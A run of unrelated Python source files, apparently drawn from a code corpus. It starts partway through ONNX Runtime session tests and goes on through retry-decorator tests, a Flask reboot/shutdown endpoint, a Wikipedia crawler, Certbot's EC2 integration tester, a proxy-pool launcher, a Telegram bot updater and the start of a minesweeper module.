sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalide_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, uncomment the line below to run copy in a separate stream
#onnxrt.capi._pybind_state.set_do_copy_in_default_stream(False)
session = onnxrt.InferenceSession(get_name("issue4829.onnx"))
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
if __name__ == '__main__':
unittest.main()
|
test_retry.py
|
from datetime import datetime
from threading import Thread
from time import sleep
import pytest
import retry
exception_message = 'testing exceptions'
def foo(bar):
if bar < 0:
raise ArithmeticError(exception_message)
return bar
def test_success_criteria():
"""Success criteria successfully raises MaximumRetriesExceeded"""
foo_with_success = retry.retry(success=lambda x: x > 0)(foo)
with pytest.raises(retry.MaximumRetriesExceeded):
foo_with_success(0)
def test_exception_criteria():
"""Exceptions specified are raised on MaximumRetriesExceeded"""
foo_with_exception = retry.retry(exceptions=(ArithmeticError,))(foo)
with pytest.raises(ArithmeticError) as exc_info:
foo_with_exception(-1)
assert exception_message in str(exc_info.value)
def test_execution():
"""Expected execution of a successful runstill works"""
foo_with_both = retry.retry(
exceptions=(ArithmeticError,), success=lambda x: x > 0)(foo)
assert foo_with_both(1) == 1
def test_interval():
"""Interval expected is the interval to complete an action"""
def _success_interval(in_dict):
in_dict['num'] += 1
return in_dict['num']
baz_with_interval = retry.retry(
success=lambda x: x > 5, interval=1)(_success_interval)
start = datetime.now()
baz_with_interval({'num': 0})
elapsed = datetime.now() - start
assert elapsed.seconds >= 5
def test_invalid_parameters():
"""The exceptions and success parameter can not both be None"""
with pytest.raises(TypeError):
retry.retry(exceptions=None, success=None)(foo)
def test_unsuccessful_timeout():
"""Unsuccessful functions with a timeout work"""
foo_with_timeout = retry.retry(
success=lambda x: x > 0, timeout=5, interval=1)(foo)
with pytest.raises(retry.MaximumTimeoutExceeded):
foo_with_timeout(-1)
def test_successful_timeout():
"""Success with a timeout still works"""
def _success_timeout(in_dict):
in_dict['num'] += 1
return in_dict['num']
try:
_test_func = retry.retry(
success=lambda x: x == 5, timeout=10, interval=1)(
_success_timeout)
_test_func({'num': 0})
except retry.MaximumTimeoutExceeded:
pytest.fail('Expected the timeout not to be exceeded')
def test_disarm_signal_on_success():
"""Success with a timeout disarms signal"""
_test_func = retry.retry(success=lambda x: True, timeout=1, interval=0.5)(foo)
_test_func(1)
sleep(1.2)
def test_successful_thread():
"""Success with function as thread"""
retryed = []
@retry.retry(timeout=1, success=lambda x: len(x) == 3)
def f(retryed):
retryed.append(0)
return retryed
t = Thread(target=f, args=[retryed])
t.start()
t.join()
assert 3 == len(retryed)
def test_unsuccessful_thread():
"""Unsuccessful with function as thread, timed out"""
retryed = []
def foo(retryed):
@retry.retry(timeout=1, success=lambda x: False)
def bar(retryed):
sleep(0.2)
retryed.append(0)
with pytest.raises(retry.MaximumTimeoutExceeded):
bar(retryed)
t = Thread(target=foo, args=[retryed])
t.start()
t.join()
assert 3 <= len(retryed) <= 5
|
rasprest.py
|
import os
from threading import Thread
import time
from subprocess import run
from flask import Flask, request
app = Flask(__name__)
passwd = open(os.path.expanduser('~/.passwd.txt')).readlines()[0].strip()
class Command:
'''
Given a command argument list, run command after seconds delay.
'''
def __init__(self, command_list, seconds=10):
self.command_list = command_list
self.seconds = seconds
def __call__(self):
time.sleep(self.seconds)
run(self.command_list)
def check_password(password):
return passwd == password
def auth(f):
def wrapped_auth():
password = request.args.get('password')
if check_password(password):
return f()
else:
return 'Unauthorized', 401
wrapped_auth.__name__ = f.__name__
return wrapped_auth
@app.route('/reboot')
@auth
def reboot():
Thread(target=Command(['sudo', 'reboot'])).start()
return 'Rebooting...'
@app.route('/shutdown')
@auth
def shutdown():
Thread(target=Command(['sudo', 'poweroff'])).start()
return 'Shutting down...'
if __name__ == '__main__':
app.run()
|
wikicrawl.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 31 15:32:00 2017
@author: dataquanty
"""
import wikipedia
from csv import reader
import time
import threading
import sys
import warnings
def getWikipediaStats(page):
pagelmt = page.rsplit('_',3)
try:
wikipedia.set_lang(pagelmt[1][:2])
wikipage = wikipedia.page(pagelmt[0],preload=False)
properties = ['\"' + str(page).replace('\"','\"\"') + '\"']
properties.append(str(len(wikipage.summary)))
properties.append(str(len(wikipage.categories)))
properties.append(str(len(wikipage.images)))
properties.append(str(len(wikipage.links)))
properties.append(str(len(wikipage.references)))
#properties.append(str(len(wikipage.sections)))
except:
properties = ['\"' + str(page).replace('\"','\"\"') + '\"']
properties = properties + ['','','','','']
strout = ','.join(properties) + '\n'
sys.stdout.write(strout)
t1 = time.time()
pages = []
with open('train_1_trail64.csv','r') as f:
i = 0
ff = reader(f, delimiter=',', quotechar='"')
for l in ff:
i+=1
if i==1:
sys.stdout.write('Page,summary,cat,images,links,refs\n')
else:
pages.append(l[0])
if i%100==0:
threads = [threading.Thread(target=getWikipediaStats, args=(page,)) for page in pages]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
pages = []
if i%5000==0:
warnings.warn(str(i) + ' in ' + str(round((time.time()-t1)/3600,2)))
threads = [threading.Thread(target=getWikipediaStats, args=(page,)) for page in pages]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
f.close()
#print round(time.time()-t1)
|
multitester.py
|
"""
Certbot Integration Test Tool
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>letstest targets/targets.yaml MyKeyPair.pem HappyHacker scripts/test_apache2.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
import argparse
import multiprocessing as mp
from multiprocessing import Manager
import os
import socket
import sys
import tempfile
import time
import traceback
import urllib.error as urllib_error
import urllib.request as urllib_request
import boto3
from botocore.exceptions import ClientError
import yaml
from fabric import Config
from fabric import Connection
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_apache2.sh',
help='path of bash script in to deploy and run')
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status:
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
self_destruct,
machine_type='t2.micro'):
"""Creates an instance using the given parameters.
If self_destruct is True, the instance will be configured to shutdown after
1 hour and to terminate itself on shutdown.
"""
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
kwargs = {
'BlockDeviceMappings': block_device_mappings,
'ImageId': ami_id,
'SecurityGroupIds': [security_group_id],
'SubnetId': subnet_id,
'KeyName': keyname,
'MinCount': 1,
'MaxCount': 1,
'InstanceType': machine_type,
'TagSpecifications': tag_spec
}
if self_destruct:
kwargs['InstanceInitiatedShutdownBehavior'] = 'terminate'
kwargs['UserData'] = '#!/bin/bash\nshutdown -P +60\n'
return ec2_client.create_instances(**kwargs)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
booting_instance.wait_until_running()
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
# After waiting for the instance to be running and reloading the instance
# state, we should have an IP address.
assert booting_instance.public_ip_address is not None
block_until_ssh_open(booting_instance.public_ip_address)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(local_cxn, repo_url, log_dir):
"""clones master of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt'% (log_dir, repo_url))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt'% log_dir)
def local_git_branch(local_cxn, repo_url, branch_name, log_dir):
"""clones branch <branch_name> of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt --branch %s --single-branch'%
(log_dir, repo_url, branch_name))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_git_PR(local_cxn, repo_url, PRnumstr, log_dir, merge_master=True):
"""clones specified pull request from repo_url and optionally merges into master"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt' % (log_dir, repo_url))
local_cxn.local('cd %s && cd letsencrypt && '
'git fetch origin pull/%s/head:lePRtest' % (log_dir, PRnumstr))
local_cxn.local('cd %s && cd letsencrypt && git checkout lePRtest' % log_dir)
if merge_master:
local_cxn.local('cd %s && cd letsencrypt && git remote update origin' % log_dir)
local_cxn.local('cd %s && cd letsencrypt && '
'git merge origin/master -m "testmerge"' % log_dir)
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_repo_to_remote(cxn, log_dir):
"""copies local tarball of repo to remote"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
cxn.put(local=local_path, remote='')
cxn.run('tar xzf %s' % filename)
def local_repo_clean(local_cxn, log_dir):
"""delete tarball"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
local_cxn.local('rm %s' % local_path)
def deploy_script(cxn, scriptpath, *args):
"""copies to remote and executes local script"""
cxn.put(local=scriptpath, remote='', preserve_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
cxn.run('./'+scriptfile+' '+args_str)
def install_and_launch_certbot(cxn, instance, target, log_dir):
local_repo_to_remote(cxn, log_dir)
# This needs to be like this, I promise. 1) The env argument to run doesn't work.
# See https://github.com/fabric/fabric/issues/1744. 2) prefix() sticks an && between
# the commands, so it needs to be exports rather than no &&s in between for the script subshell.
with cxn.prefix('export PUBLIC_IP=%s && export PRIVATE_IP=%s && '
'export PUBLIC_HOSTNAME=%s && export PIP_EXTRA_INDEX_URL=%s && '
'export OS_TYPE=%s' %
(instance.public_ip_address,
instance.private_ip_address,
instance.public_dns_name,
cl_args.alt_pip,
target['type'])):
deploy_script(cxn, cl_args.test_script)
def grab_certbot_log(cxn):
"grabs letsencrypt.log via cat into logged stdout"
cxn.sudo('/bin/bash -l -i -c \'if [ -f "/var/log/letsencrypt/letsencrypt.log" ]; then ' +
'cat "/var/log/letsencrypt/letsencrypt.log"; else echo "[novarlog]"; fi\'')
# fallback file if /var/log is unwriteable...? correct?
cxn.sudo('/bin/bash -l -i -c \'if [ -f ./certbot.log ]; then ' +
'cat ./certbot.log; else echo "[nolocallog]"; fi\'')
def create_client_instance(ec2_client, target, security_group_id, subnet_id, self_destruct):
"""Create a single client instance for running tests."""
if 'machine_type' in target:
machine_type = target['machine_type']
elif target['virt'] == 'hvm':
machine_type = 't2.medium'
else:
# 32 bit systems
machine_type = 'c1.medium'
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
self_destruct=self_destruct)
def test_client_process(fab_config, inqueue, outqueue, log_dir):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(log_dir+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(host_string)
with Connection(host_string, config=fab_config) as cxn:
try:
install_and_launch_certbot(cxn, instance, target, log_dir)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
grab_certbot_log(cxn)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist, log_dir):
print('Logs in ', log_dir)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) != len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
fab_config = Config(overrides={
"connect_kwargs": {
"key_filename": [KEYFILE], # https://github.com/fabric/fabric/issues/2007
},
"run": {
"echo": True,
"pty": True,
},
"timeouts": {
"connect": 10,
},
})
# no network connection, so don't worry about closing this one.
local_cxn = Connection('localhost', config=fab_config)
# Set up local copy of git repo
#-------------------------------------------------------------------------------
log_dir = tempfile.mkdtemp() # points to logging / working directory
print("Local dir for test repo and logs: %s"%log_dir)
try:
# figure out what git object to test and locally create it in log_dir
print("Making local git repo")
if cl_args.pull_request != '~':
print('Testing PR %s ' % cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
local_git_PR(local_cxn, cl_args.repo, cl_args.pull_request, log_dir,
cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s' % (cl_args.branch, cl_args.repo))
local_git_branch(local_cxn, cl_args.repo, cl_args.branch, log_dir)
else:
print('Testing current branch of %s' % cl_args.repo, log_dir)
local_git_clone(local_cxn, cl_args.repo, log_dir)
except BaseException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit(1)
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.safe_load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
instances = []
try:
print("Creating instances: ", end="")
# If we want to preserve instances, do not have them self-destruct.
self_destruct = not cl_args.saveinstances
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id,
self_destruct)
)
print()
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%log_dir)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
client_process_args=(fab_config, inqueue, outqueue, log_dir)
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=client_process_args)
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
local_repo_clean(local_cxn, log_dir)
# print and save summary results
results_file = open(log_dir+'/results', 'w')
outputs = list(iter(outqueue.get, SENTINEL))
outputs.sort(key=lambda x: x[0])
failed = False
results_msg = ""
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
with open(log_dir+'/'+'%d_%s.log'%(ii,target['name']), 'r') as f:
print(target['name'] + " test failed. Test log:")
print(f.read())
results_msg = results_msg + '%d %s %s\n'%(ii, target['name'], status)
results_file.write('%d %s %s\n'%(ii, target['name'], status))
print(results_msg)
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist, log_dir)
if __name__ == '__main__':
main()
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
Description : 运行主函数
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
from multiprocessing import Process
import time
sys.path.append('../')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run():
p_list = list()
p1 = Process(target=ProxyApiRun, name='ProxyApiRun')
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun')
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun')
p_list.append(p3)
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
print("Waiting for MongoDB...")
time.sleep(10)
run()
|
obupdater.py
|
import telegram
import queue
import html
import logging
from obupdater import long_poll, webhooks
import urllib.parse
import settings
import threading
import traceback
import sentry_support
class OBUpdater:
def __init__(self, bot, modloader):
self.logger = logging.getLogger("OBUpdater")
self.upd_queue = queue.Queue()
self.bot = bot
self.modloader = modloader
self.bot.modloader = self.modloader
self.update_id = 0
def update_handle(self, bot, update):
raise RuntimeError
def command_handle(self, bot, update):
raise RuntimeError
def message_handle(self, bot, update):
raise RuntimeError
def inline_handle(self, bot, update):
raise RuntimeError
def inline_kbd_handle(self, bot, update):
raise RuntimeError
def _poll_worker(self):
while 1:
bot, update = self.upd_queue.get()
try:
if update.update_id < self.update_id - 1:
continue
if update.message:
if update.message.caption:
update.message.text = update.message.caption
if update.message.reply_to_message:
if update.message.reply_to_message.caption:
update.message.reply_to_message.text = update.message.reply_to_message.caption
if not update.message.text:
update.message.text = ""
if self.message_handle(bot, update):
continue
if self.command_handle(bot, update):
continue
elif update.inline_query:
if self.inline_handle(bot, update):
continue
elif update.callback_query:
if self.inline_kbd_handle(bot, update):
continue
self.update_handle(bot, update)
except (telegram.error.Unauthorized, telegram.error.NetworkError): pass
except Exception as e:
self.logger.error(e)
try:
if settings.USE_SENTRY:
sentry_support.catch_exc(update.to_dict())
else:
bot.sendMessage(
settings.ADMIN,
"Uncatched worker Exception:\n<code>%s</code>\nUpdate:\n<code>%s</code>" %
(html.escape(traceback.format_exc()), update), parse_mode="HTML")
except Exception as e:
self.logger.error("Unable to send exception report!")
self.logger.error(e)
def _create_workers(self):
self.logger.info("Creating update workers...")
for i in range(0, settings.THREADS):
self.logger.debug("Creating update worker %s out of %s", i+1, settings.THREADS)
threading.Thread(target=self._poll_worker).start()
self.logger.info("Creating update workers done")
def start_poll(self):
self.bot.deleteWebhook() # Make sure no webhooks are installed
self._create_workers()
mirrors = settings.MIRRORS
mirrors["Main Bot"] = settings.TOKEN
for mirror_name, mirror_token in mirrors.items():
upd_poller = long_poll.create_poll(mirror_name, mirror_token, self.upd_queue, self.modloader)
threading.Thread(target=upd_poller).start()
def start_webhook(self):
self.bot.deleteWebhook() # Make sure no other webhooks are installed
self._create_workers()
webhook = webhooks.create_webhook(self.upd_queue, self.bot)
self.bot.setWebhook(url=urllib.parse.urljoin(settings.WEBHOOK_URL, "/%s" % settings.TOKEN))
webhook.run(host=settings.WEBHOOK_PORT_EXPOSE, port=settings.WEBHOOK_PORT)
|
state.py
|
import logging
import time
from threading import RLock
from typing import Optional
from fastapi import HTTPException, status
from minesweeper.game import Minesweeper, Status
from .models import Move, Square, Start
